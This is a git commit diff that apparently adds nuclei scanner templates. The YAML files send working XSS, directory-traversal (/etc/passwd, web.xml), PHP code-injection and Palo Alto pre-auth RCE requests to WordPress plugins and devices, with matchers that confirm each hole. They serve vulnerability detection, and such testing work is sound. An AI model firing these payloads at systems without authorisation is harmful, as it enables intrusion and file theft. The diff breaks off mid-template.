commit
dd8f248892
|
@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||||
| cves | 430 | vulnerabilities | 233 | exposed-panels | 200 |
|
| cves | 460 | vulnerabilities | 236 | exposed-panels | 200 |
|
||||||
| takeovers | 70 | exposures | 116 | technologies | 120 |
|
| takeovers | 70 | exposures | 116 | technologies | 125 |
|
||||||
| misconfiguration | 77 | workflows | 33 | miscellaneous | 27 |
|
| misconfiguration | 77 | workflows | 33 | miscellaneous | 27 |
|
||||||
| default-logins | 37 | file | 42 | dns | 10 |
|
| default-logins | 44 | file | 42 | dns | 10 |
|
||||||
| fuzzing | 10 | helpers | 9 | iot | 18 |
|
| fuzzing | 10 | helpers | 9 | iot | 18 |
|
||||||
|
|
||||||
**128 directories, 1551 files**.
|
**134 directories, 1596 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: CVE-2009-1558
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
|
||||||
|
reference: https://www.exploit-db.com/exploits/32954
|
||||||
|
tags: cve,cve2009,iot,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2012-1835
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835
|
||||||
|
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,38 @@
|
||||||
|
id: CVE-2013-3827
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Javafaces LFI
|
||||||
|
author: Random-Robbie
|
||||||
|
severity: medium
|
||||||
|
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
|
||||||
|
tags: cve,cve2013,lfi,javafaces,oracle
|
||||||
|
reference: |
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
|
||||||
|
- https://www.exploit-db.com/exploits/38802
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||||
|
- "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||||
|
- "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||||
|
- "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||||
|
- "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||||
|
- "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||||
|
- "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||||
|
- "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||||
|
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||||
|
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<web-app"
|
||||||
|
- "</web-app>"
|
||||||
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: CVE-2016-1000128
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2016-1000129
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2016-1000130
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Reflected XSS in wordpress plugin e-search v1.0
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: CVE-2016-1000131
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2016-1000132
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&msg=imported"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2016-1000133
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%22%20%3C%2Fscript%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2016-1000134
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Reflected XSS in wordpress plugin hdw-tube v1.2
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2016-1000135
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Reflected XSS in wordpress plugin hdw-tube v1.2
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: CVE-2016-10960
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
|
||||||
|
author: daffainfo
|
||||||
|
severity: critical
|
||||||
|
description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
|
||||||
|
reference: |
|
||||||
|
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
|
||||||
|
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
|
||||||
|
tags: cve,cve2016,wordpress,wp-plugin,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
|
||||||
|
body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Nuclei: CVE-2016-10960"
|
||||||
|
condition: and
|
||||||
|
part: header
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -2,22 +2,26 @@ id: CVE-2017-15944
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: PreAuth RCE on Palo Alto GlobalProtect
|
name: PreAuth RCE on Palo Alto GlobalProtect
|
||||||
author: emadshanab
|
author: emadshanab,milo2012
|
||||||
reference: http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
|
reference: |
|
||||||
|
- https://www.exploit-db.com/exploits/43342
|
||||||
|
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
|
||||||
severity: high
|
severity: high
|
||||||
tags: cve,cve2017,rce,vpn,paloalto
|
tags: cve,cve2017,rce,vpn,paloalto,globalprotect
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/global-protect/portal/css/login.css"
|
GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Cookie: PHPSESSID={{randstr}};
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT"
|
- "@start@Success@end@"
|
||||||
part: header
|
part: body
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2017-17043
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043
|
||||||
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2017-17059
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
|
||||||
|
reference: |
|
||||||
|
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
|
||||||
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
|
||||||
|
|
||||||
|
body: "amty_hidden=1"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2017-17451
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451
|
||||||
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2017-18536
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
|
||||||
|
reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
|
||||||
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<img src=x onerror=javascript:prompt(123)>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2017-9288
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter).
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288
|
||||||
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<img src=x onerror=alert(123)>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2018-11709
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709
|
||||||
|
tags: cve,cve2018,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2018-12031
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Eaton Intelligent Power Manager 1.6 - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
|
||||||
|
reference: |
|
||||||
|
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031
|
||||||
|
- https://www.exploit-db.com/exploits/48614
|
||||||
|
tags: cve,cve2018,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd"
|
||||||
|
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[0*]:0:0"
|
||||||
|
- "\\[(font|extension|file)s\\]"
|
||||||
|
condition: or
|
||||||
|
part: body
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2018-20462
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462
|
||||||
|
tags: cve,cve2018,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2018-5316
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter.
|
||||||
|
